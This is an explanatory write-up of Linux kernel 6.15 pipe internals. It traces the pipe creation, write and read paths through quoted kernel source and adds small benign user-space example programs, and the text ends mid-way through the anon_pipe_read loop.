# Linux Kernel - analyze pipe
> Author: 堇姬 Naup
## pipe
A pipe is an IPC mechanism: it lets different processes communicate with each other, and is created through the `pipe` syscall.
https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md


Both `pipe` and `pipe2` eventually call `do_pipe2`; the difference is that `pipe2` also accepts flags.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1051
SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
return do_pipe2(fildes, flags);
}
SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
return do_pipe2(fildes, 0);
}
```
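As a quick user-space sketch of the difference (assuming glibc's `pipe2` wrapper; this is an illustration, not kernel code):
```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    int fd[2];
    /* pipe2 lets us request O_CLOEXEC / O_NONBLOCK atomically,
     * instead of pipe() followed by fcntl() on each end. */
    if (pipe2(fd, O_CLOEXEC | O_NONBLOCK) == -1) {
        perror("pipe2");
        return 1;
    }
    printf("read end = %d, write end = %d\n", fd[0], fd[1]);
    close(fd[0]);
    close(fd[1]);
    return 0;
}
```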
`do_pipe2` calls `__do_pipe_flags`, then binds the `struct file`s and fds allocated there together as the read end and the write end.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1029
/*
* sys_pipe() is the normal C calling standard for creating
* a pipe. It's not the way Unix traditionally does this, though.
*/
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;
error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}
```
`__do_pipe_flags` passes an array of two `struct file *` into `create_pipe_files`, which builds the pipe's internal structure (`pipe_inode_info`), creates two `struct file`s and sets up their `f_op`.
It then calls `get_unused_fd_flags` twice to find unused fds and returns them; those become the read-end and write-end fds.
`audit_fd_pair` in turn calls `__audit_fd_pair`, which records the fd pair in the current `audit_context`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L976
static int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;
if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;
error = create_pipe_files(files, flags);
if (error)
return error;
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_read_pipe;
fdr = error;
error = get_unused_fd_flags(flags);
if (error < 0)
goto err_fdr;
fdw = error;
audit_fd_pair(fdr, fdw);
fd[0] = fdr;
fd[1] = fdw;
/* pipe groks IOCB_NOWAIT */
files[0]->f_mode |= FMODE_NOWAIT;
files[1]->f_mode |= FMODE_NOWAIT;
return 0;
err_fdr:
put_unused_fd(fdr);
err_read_pipe:
fput(files[0]);
fput(files[1]);
return error;
}
```
`create_pipe_files` sets up quite a lot. First it gets the pipe inode, which allocates a `struct pipe_inode_info` (the pipe metadata describing the whole pipe's state) and associates it with the inode (mainly by handing it the `pipe_inode_info` pointer and the ops; see the code for details, it is not important here).
It then uses `alloc_file_pseudo` to create a write-only file, and clones it into a read-only file; both point at the same `inode`. These two files are what end up behind the read-end and write-end fds:
```c
int fd[2];
pipe(fd); // fd[0] = read end, fd[1] = write end
```
which is exactly what a `pipe()` call returns.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L925
int create_pipe_files(struct file **res, int flags)
{
struct inode *inode = get_pipe_inode();
struct file *f;
int error;
if (!inode)
return -ENFILE;
if (flags & O_NOTIFICATION_PIPE) {
error = watch_queue_init(inode->i_pipe);
if (error) {
free_pipe_info(inode->i_pipe);
iput(inode);
return error;
}
}
f = alloc_file_pseudo(inode, pipe_mnt, "",
O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
&pipeanon_fops);
if (IS_ERR(f)) {
free_pipe_info(inode->i_pipe);
iput(inode);
return PTR_ERR(f);
}
f->private_data = inode->i_pipe;
f->f_pipe = 0;
res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
&pipeanon_fops);
if (IS_ERR(res[0])) {
put_pipe_info(inode, inode->i_pipe);
fput(f);
return PTR_ERR(res[0]);
}
res[0]->private_data = inode->i_pipe;
res[0]->f_pipe = 0;
res[1] = f;
stream_open(inode, res[0]);
stream_open(inode, res[1]);
/*
* Disable permission and pre-content events, but enable legacy
* inotify events for legacy users.
*/
file_set_fsnotify_mode(res[0], FMODE_NONOTIFY_PERM);
file_set_fsnotify_mode(res[1], FMODE_NONOTIFY_PERM);
return 0;
}
```
`get_pipe_inode` allocates an inode ([struct source](https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/fs.h#L672)) and initializes it: it points `i_pipe` at the newly allocated `pipe_inode_info`, sets the fops, and fills in the fsuid/fsgid, mode, and timestamps.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L885
static struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;
if (!inode)
goto fail_inode;
inode->i_ino = get_next_ino();
pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;
inode->i_pipe = pipe;
pipe->files = 2;
pipe->readers = pipe->writers = 1;
inode->i_fop = &pipeanon_fops;
/*
* Mark the inode dirty from the very beginning,
* that way it will never be moved to the dirty
* list because "mark_inode_dirty()" will think
* that it already _is_ on the dirty list.
*/
inode->i_state = I_DIRTY;
inode->i_mode = S_IFIFO | S_IRUSR | S_IWUSR;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
simple_inode_init_ts(inode);
return inode;
fail_iput:
iput(inode);
fail_inode:
return NULL;
}
```
Finally, let's look at the `struct pipe_inode_info` mentioned above. It is the metadata describing a pipe, and it carries a lot of information (a simplified sketch of how head/tail map into bufs follows the struct definition):
- head: the next slot to write
- tail: the next slot to read
- rd_wait / wr_wait: wait queues
  - when the pipe is empty, the read end sleeps on rd_wait
  - when the pipe is full, the write end sleeps on wr_wait
- max_usage: the maximum number of ring-buffer slots that may be used
- readers / writers: the number of currently active read and write ends
- files: how many `struct file`s refer to this pipe (protected by ->i_lock)
- r_counter / w_counter: counters tracking end-point opens, mainly used to detect state changes and drive wakeup logic
- poll_usage: whether this pipe is used with epoll (epoll causes more frequent wakeups and needs special handling)
- tmp_page: caches recently released pages
- bufs: points to the actual ring buffer
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L86
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @head_tail: unsigned long union of @head and @tail
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @poll_usage: is this pipe used for epoll, which has crazy wakeups?
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex;
wait_queue_head_t rd_wait, wr_wait;
/* This has to match the 'union pipe_index' above */
union {
unsigned long head_tail;
struct {
pipe_index_t head;
pipe_index_t tail;
};
};
unsigned int max_usage;
unsigned int ring_size;
unsigned int nr_accounted;
unsigned int readers;
unsigned int writers;
unsigned int files;
unsigned int r_counter;
unsigned int w_counter;
bool poll_usage;
#ifdef CONFIG_WATCH_QUEUE
bool note_loss;
#endif
struct page *tmp_page[2];
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
struct pipe_buffer *bufs;
struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue;
#endif
};
```
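Conceptually, head and tail are free-running counters and a slot number is masked into `bufs[]` with a power-of-two mask, which is why the comment says ring_size "should be a power of 2". A simplified, hedged sketch (not the verbatim kernel helpers; names with `_sketch` are made up for illustration):
```c
#include <stdio.h>

/* minimal stand-ins for the kernel structures */
struct pipe_buffer_sketch {
    void *page;
    unsigned int offset, len, flags;
};

struct pipe_ring_sketch {
    unsigned int head;        /* next slot to produce into   */
    unsigned int tail;        /* next slot to consume from   */
    unsigned int ring_size;   /* number of slots, power of 2 */
    struct pipe_buffer_sketch *bufs;
};

/* occupancy works even when the counters wrap around UINT_MAX */
static unsigned int occupancy(const struct pipe_ring_sketch *p) {
    return p->head - p->tail;
}

static int is_full(const struct pipe_ring_sketch *p) {
    return occupancy(p) >= p->ring_size;   /* the kernel compares against max_usage */
}

/* roughly what pipe_buf() boils down to: mask the index into the array */
static struct pipe_buffer_sketch *slot(struct pipe_ring_sketch *p, unsigned int idx) {
    return &p->bufs[idx & (p->ring_size - 1)];
}

int main(void) {
    struct pipe_buffer_sketch bufs[16] = {0};
    struct pipe_ring_sketch p = { .head = 17, .tail = 3, .ring_size = 16, .bufs = bufs };
    printf("occupancy=%u full=%d head slot index=%u\n",
           occupancy(&p), is_full(&p), (unsigned)(slot(&p, p.head) - p.bufs)); /* 14 0 1 */
    return 0;
}
```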
`pipe_inode_info` is allocated in `alloc_pipe_info`. It first allocates the `pipe_inode_info` itself, then allocates an array of 0x10 (16) `pipe_buffer`s, and fills the pipe information into the `pipe_inode_info`. (These sizes can be observed from user space; see the sketch after the code.)
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L791
struct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS; // #define PIPE_DEF_BUFFERS 16
struct user_struct *user = get_current_user();
unsigned long user_bufs;
// static unsigned int pipe_max_size = 1048576; (0x100000)
unsigned int max_size = READ_ONCE(pipe_max_size);
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
pipe_bufs = max_size >> PAGE_SHIFT;
user_bufs = account_pipe_buffers(user, 0, pipe_bufs);
...
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
lock_set_cmp_fn(&pipe->mutex, pipe_lock_cmp_fn, NULL);
return pipe;
}
...
return NULL;
}
```
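As a side note, these numbers are visible from user space via fcntl. A minimal sketch, assuming the defaults shown above (PIPE_DEF_BUFFERS = 16 pages, pipe_max_size = 1 MiB):
```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    int fd[2];
    if (pipe(fd) == -1) { perror("pipe"); return 1; }

    /* default ring: 16 slots * 4096 bytes = 65536 */
    printf("default pipe size: %d bytes\n", fcntl(fd[0], F_GETPIPE_SZ));

    /* unprivileged processes may grow it up to /proc/sys/fs/pipe-max-size (pipe_max_size) */
    if (fcntl(fd[0], F_SETPIPE_SZ, 1 << 20) == -1)
        perror("F_SETPIPE_SZ");
    printf("resized pipe size: %d bytes\n", fcntl(fd[0], F_GETPIPE_SZ));
    return 0;
}
```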
Next, let's look at `pipe_buffer`. This is where the data lives: each pipe manages a number of pages that hold the data being transferred through the pipe.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L17
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
```
That completes the overall picture.

Next, let's look at how a pipe is actually operated on. We can find this vtable (the `pipeanon_fops` that the inode's `i_fop` points to).
PS: one is for anonymous pipes, the other for named pipes (FIFOs):
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L1243
const struct file_operations pipefifo_fops = {
.open = fifo_open,
.read_iter = fifo_pipe_read,
.write_iter = fifo_pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
static const struct file_operations pipeanon_fops = {
.open = fifo_open,
.read_iter = anon_pipe_read,
.write_iter = anon_pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
```
These let us read from, write to, and otherwise operate on a pipe.
I am reading the 6.15 kernel, where the pipe ops functions were split like this (this looks like an efficiency optimization for anonymous pipes):
https://git.sceen.net/linux/linux-stable.git/commit/?id=71ee2fde57c707ac8f221321f3e951288f00f04b
- anon_pipe_write: writes data into the pipe_buffers
- anon_pipe_read: reads data out of the pipe_buffers
- splice: moves data between two file descriptors with as little copying as possible
## anon_pipe_write
When we write to a pipe fd (that is, write into a pipe_buffer), an anonymous pipe ends up in `anon_pipe_write`. Calling `write` first enters the syscall:
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L744
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
size_t, count)
{
return ksys_write(fd, buf, count);
}
```
It then calls `ksys_write`. If the file exists, `file_ppos` locates the current position in the file (kept in the `f_pos` field) and returns it through the pointer `*ppos`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L725
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
CLASS(fd_pos, f)(fd); // resolves the fd into a struct file (with f_pos handling)
ssize_t ret = -EBADF;
if (!fd_empty(f)) {
loff_t pos, *ppos = file_ppos(fd_file(f)); // current read/write position
if (ppos) {
pos = *ppos;
ppos = &pos;
}
ret = vfs_write(fd_file(f), buf, count, ppos);
if (ret >= 0 && ppos)
fd_file(f)->f_pos = pos;
}
return ret;
}
#define CLASS(_name, var) \
class_##_name##_t var __cleanup(class_##_name##_destructor) = \
class_##_name##_constructor
#define fd_file(f) ((struct file *)((f).word & ~(FDPUT_FPUT|FDPUT_POS_UNLOCK)))
static inline bool fd_empty(struct fd f)
{
return unlikely(!f.word);
}
/* file_ppos returns &file->f_pos or NULL if file is stream */
static inline loff_t *file_ppos(struct file *file)
{
return file->f_mode & FMODE_STREAM ? NULL : &file->f_pos;
}
```
Next it calls `vfs_write`. The VFS defines a layer of interfaces above the concrete filesystems, so applications can access the underlying data through the interfaces VFS defines without caring how the backend is implemented.
https://students.mimuw.edu.pl/ZSO/Wyklady/08_VFS1/VFS-1.pdf
* file: the file to write to (struct file)
* buf: the user-space data buffer
* count: the number of bytes to write
* pos: pointer to the write position (offset) in the file
vfs_write is the unified write entry point of the Linux VFS layer. It covers:
* permission and parameter validity checks (on the file)
* position and size validation
* calling the filesystem-specific write function
* notifying filesystem events after the write
* locking and accounting
It is what connects the write() syscall to the actual filesystem write. Ignoring the rest for now, it looks up the write method in the vtable of the file you passed in and finally reaches the target:
`vfs_write` → `new_sync_write` → `filp->f_op->write_iter(&kiocb, &iter)` → `anon_pipe_write()`
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L664
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;
if (!(file->f_mode & FMODE_WRITE))
return -EBADF;
if (!(file->f_mode & FMODE_CAN_WRITE))
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;
ret = rw_verify_area(WRITE, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
file_start_write(file);
if (file->f_op->write)
ret = file->f_op->write(file, buf, count, pos);
else if (file->f_op->write_iter)
ret = new_sync_write(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_modify(file);
add_wchar(current, ret);
}
inc_syscw(current);
file_end_write(file);
return ret;
}
```
This part wires up the kiocb, the iov_iter, and so on. A simple way to understand it: the kiocb carries the file, the write position, state and other Linux I/O context, while the iov_iter tells the kernel where to take the data from (see the small user-space analogue after the code).
```c
static ssize_t new_sync_write(struct file *filp, const char __user *buf, size_t len, loff_t *ppos)
{
struct kiocb kiocb;
struct iov_iter iter;
ssize_t ret;
init_sync_kiocb(&kiocb, filp);
kiocb.ki_pos = (ppos ? *ppos : 0);
iov_iter_ubuf(&iter, ITER_SOURCE, (void __user *)buf, len);
ret = filp->f_op->write_iter(&kiocb, &iter);
BUG_ON(ret == -EIOCBQUEUED);
if (ret > 0 && ppos)
*ppos = kiocb.ki_pos;
return ret;
}
```
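As a rough user-space analogue (an illustration, not the kernel API): `struct iovec` plus `writev()` describes exactly the kind of (base, len) segment list that an iov_iter iterates over inside the kernel.
```c
#include <stdio.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void) {
    int fd[2];
    if (pipe(fd) == -1) { perror("pipe"); return 1; }

    struct iovec iov[2] = {
        { .iov_base = "hello, ", .iov_len = 7 },
        { .iov_base = "pipe\n",  .iov_len = 5 },
    };
    /* one syscall, two source segments; the kernel walks them via an iov_iter */
    ssize_t n = writev(fd[1], iov, 2);
    printf("wrote %zd bytes\n", n);

    char buf[32];
    n = read(fd[0], buf, sizeof(buf));
    printf("read back: %.*s", (int)n, buf);
    return 0;
}
```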
Now for the main part: the write behaviour of an anonymous pipe. It starts with some initialization:
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L431
static ssize_t
anon_pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
```
This part tries to merge the new data into the most recently written buffer. If the pipe is not empty and the write's tail portion is smaller than one page, it checks whether merging would overflow the page and whether that pipe_buffer (at head - 1) has `PIPE_BUF_FLAG_CAN_MERGE` set. If merging is allowed, it computes the offset of the unused part of the page and copies the data onto that page.
```c
head = pipe->head;
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
if (chars && !was_empty) {
struct pipe_buffer *buf = pipe_buf(pipe, head - 1);
int offset = buf->offset + buf->len;
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}
```
This is the main loop. It first checks some pipe state, including whether the pipe is currently full. If a write is possible, it grabs a page to use: `anon_pipe_get_page` wraps the logic of allocating a page or reusing a cached tmp_page, but either way you get a page that will back the pipe_buffer and hold the data. The data is then copied in with copy_page_from_iter(). After the copy, head is advanced and the pipe_buffer is filled in (including the page that was just written): its offset is set to 0 (the copy started at 0) and its len is set to the number of bytes copied. Finally, depending on whether the pipe is packetized, the flags are set, which decides whether this page may later be merged into. (A small user-space demo of the pipe-full branch follows the code.)
```c
for (;;) {
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
struct pipe_buffer *buf;
struct page *page;
int copied;
page = anon_pipe_get_page(pipe);
if (unlikely(!page)) {
if (!ret)
ret = -ENOMEM;
break;
}
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
anon_pipe_put_page(pipe, page);
if (!ret)
ret = -EFAULT;
break;
}
pipe->head = head + 1;
/* Insert it into the buffer array */
buf = pipe_buf(pipe, head);
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
buf->len = copied;
ret += copied;
if (!iov_iter_count(from))
break;
continue;
}
/* Wait for buffer space to become available. */
if ((filp->f_flags & O_NONBLOCK) ||
(iocb->ki_flags & IOCB_NOWAIT)) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
/*
* We're going to release the pipe lock and wait for more
* space. We wake up any readers if necessary, and then
* after waiting we need to re-check whether the pipe
* become empty while we dropped the lock.
*/
mutex_unlock(&pipe->mutex);
if (was_empty)
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
mutex_lock(&pipe->mutex);
was_empty = pipe_is_empty(pipe);
wake_next_writer = true;
}
```
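To see the pipe_full() / wait branch from user space, here is a minimal sketch assuming the default 16-slot ring (65536 bytes): a non-blocking write returns EAGAIN once the ring is full, which is exactly the point where a blocking writer would sleep on wr_wait.
```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void) {
    int fd[2];
    if (pipe2(fd, O_NONBLOCK) == -1) { perror("pipe2"); return 1; }

    char page[4096];
    memset(page, 'A', sizeof(page));

    size_t total = 0;
    for (;;) {
        ssize_t n = write(fd[1], page, sizeof(page));
        if (n == -1) {
            if (errno == EAGAIN)   /* ring is full: a blocking writer would sleep here */
                break;
            perror("write");
            return 1;
        }
        total += (size_t)n;
    }
    /* with the default 16-slot ring this typically prints 65536 (16 * 4096) */
    printf("pipe filled after %zu bytes\n", total);
    return 0;
}
```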
That is roughly the overall write logic. I want to go into a bit more detail on `copy_page_from_iter`. It takes the page to copy into, the starting offset, the number of bytes to write, and the iter:
- page_copy_sane checks that the given offset and byte count are sane
- `kmap_local_page` maps the page into a kernel virtual address so it can be accessed, and the maximum number of bytes that can be copied into this page is computed
- after the copy, `kunmap_local` unmaps it again
```c
size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
size_t res = 0;
if (!page_copy_sane(page, offset, bytes))
return 0;
page += offset / PAGE_SIZE; // first subpage
offset %= PAGE_SIZE;
while (1) {
void *kaddr = kmap_local_page(page);
size_t n = min(bytes, (size_t)PAGE_SIZE - offset);
n = _copy_from_iter(kaddr + offset, n, i);
kunmap_local(kaddr);
res += n;
bytes -= n;
if (!bytes || !n)
break;
offset += n;
if (offset == PAGE_SIZE) {
page++;
offset = 0;
}
}
return res;
}
EXPORT_SYMBOL(copy_page_from_iter);
```
Using it looks roughly like this: create the pipe with `pipe`, then fork a child process. The child blocks in read (there is nothing to read yet) and waits on the pipe; once the parent writes data into the pipe, the child reads it.
```c
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/wait.h>   /* for wait() */
int main() {
int pipefd[2];
pid_t cpid;
char buf[100];
if (pipe(pipefd) == -1) {
perror("pipe");
exit(EXIT_FAILURE);
}
cpid = fork();
if (cpid == -1) {
perror("fork");
exit(EXIT_FAILURE);
}
if (cpid == 0) {
close(pipefd[1]);
ssize_t n = read(pipefd[0], buf, sizeof(buf) - 1);
if (n > 0) {
buf[n] = '\0';
printf("Child read from pipe: %s\n", buf);
}
close(pipefd[0]);
exit(EXIT_SUCCESS);
} else {
close(pipefd[0]);
const char *msg = "Hello, pipe!";
write(pipefd[1], msg, strlen(msg));
close(pipefd[1]);
wait(NULL);
exit(EXIT_SUCCESS);
}
}
```
## anon_pipe_read
The first part is very similar to write: the syscall leads to `ksys_read`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L720
SYSCALL_DEFINE3(read, unsigned int, fd, char __user *, buf, size_t, count)
{
return ksys_read(fd, buf, count);
}
```
The same flow handles the fd and the buffer, then calls `vfs_read`.
```c
ssize_t ksys_read(unsigned int fd, char __user *buf, size_t count)
{
CLASS(fd_pos, f)(fd);
ssize_t ret = -EBADF;
if (!fd_empty(f)) {
loff_t pos, *ppos = file_ppos(fd_file(f));
if (ppos) {
pos = *ppos;
ppos = &pos;
}
ret = vfs_read(fd_file(f), buf, count, ppos);
if (ret >= 0 && ppos)
fd_file(f)->f_pos = pos;
}
return ret;
}
```
Again it performs quite a few checks and then calls `new_sync_read`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L550
ssize_t vfs_read(struct file *file, char __user *buf, size_t count, loff_t *pos)
{
ssize_t ret;
if (!(file->f_mode & FMODE_READ))
return -EBADF;
if (!(file->f_mode & FMODE_CAN_READ))
return -EINVAL;
if (unlikely(!access_ok(buf, count)))
return -EFAULT;
ret = rw_verify_area(READ, file, pos, count);
if (ret)
return ret;
if (count > MAX_RW_COUNT)
count = MAX_RW_COUNT;
if (file->f_op->read)
ret = file->f_op->read(file, buf, count, pos);
else if (file->f_op->read_iter)
ret = new_sync_read(file, buf, count, pos);
else
ret = -EINVAL;
if (ret > 0) {
fsnotify_access(file);
add_rchar(current, ret);
}
inc_syscr(current);
return ret;
}
```
After initializing the kiocb and the iter, it calls `filp->f_op->read_iter`, which through the vtable actually lands in `anon_pipe_read`.
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L479
static ssize_t new_sync_read(struct file *filp, char __user *buf, size_t len, loff_t *ppos)
{
struct kiocb kiocb;
struct iov_iter iter;
ssize_t ret;
init_sync_kiocb(&kiocb, filp);
kiocb.ki_pos = (ppos ? *ppos : 0);
iov_iter_ubuf(&iter, ITER_DEST, buf, len);
ret = filp->f_op->read_iter(&kiocb, &iter);
BUG_ON(ret == -EIOCBQUEUED);
if (ppos)
*ppos = kiocb.ki_pos;
return ret;
}
```
It starts by initializing some variables:
* iocb: contains the current file pointer (filp)
* to: the iov_iter that the read data will be written into
* total_len: the number of bytes this read expects to transfer
* pipe: the anonymous pipe's data structure
```c
// https://elixir.bootlin.com/linux/v6.15.9/source/fs/pipe.c#L270
static ssize_t
anon_pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
size_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool wake_writer = false, wake_next_reader = false;
ssize_t ret;
/* Null read succeeds. */
if (unlikely(total_len == 0))
return 0;
ret = 0;
mutex_lock(&pipe->mutex);
```
Then comes the main loop (a small demo of the packet-mode branch follows the loop):
- smp_load_acquire reads head, and tail is read as well (head: the next pipe_buffer slot to write, tail: the next pipe_buffer slot to read)
- we ignore the CONFIG_WATCH_QUEUE branch for now
- check that the pipe is not empty
- take the buffer (and its page) at tail
- `copy_page_to_iter` copies it into the iter (the user buffer); if less was copied than expected, return an error
- advance the buffer's offset to account for the range already read, and subtract chars from its len
- finally, update tail
```c
/*
* We only wake up writers if the pipe was full when we started reading
* and it is no longer full after reading to avoid unnecessary wakeups.
*
* But when we do wake up writers, we do so using a sync wakeup
* (WF_SYNC), because we want them to get going and generate more
* data for us.
*/
for (;;) {
/* Read ->head with a barrier vs post_one_notification() */
unsigned int head = smp_load_acquire(&pipe->head);
unsigned int tail = pipe->tail;
#ifdef CONFIG_WATCH_QUEUE
if (pipe->note_loss) {
struct watch_notification n;
if (total_len < 8) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
n.type = WATCH_TYPE_META;
n.subtype = WATCH_META_LOSS_NOTIFICATION;
n.info = watch_sizeof(n);
if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
if (ret == 0)
ret = -EFAULT;
break;
}
ret += sizeof(n);
total_len -= sizeof(n);
pipe->note_loss = false;
}
#endif
if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = pipe_buf(pipe, tail);
size_t chars = buf->len;
size_t written;
int error;
if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}
error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;
/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}
if (!buf->len) {
wake_writer |= pipe_full(head, tail, pipe->max_usage);
tail = pipe_update_tail(pipe, buf, tail);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
if (!pipe->writers)
break;
if (ret)
break;
if ((filp->f_flags & O_NONBLOCK) ||
(iocb->ki_flags & IOCB_NOWAIT)) {
ret = -EAGAIN;
break;
}
mutex_unlock(&pipe->mutex);
/*
* We only get here if we didn't actually read anything.
*
* But because we didn't read anything, at this point we can
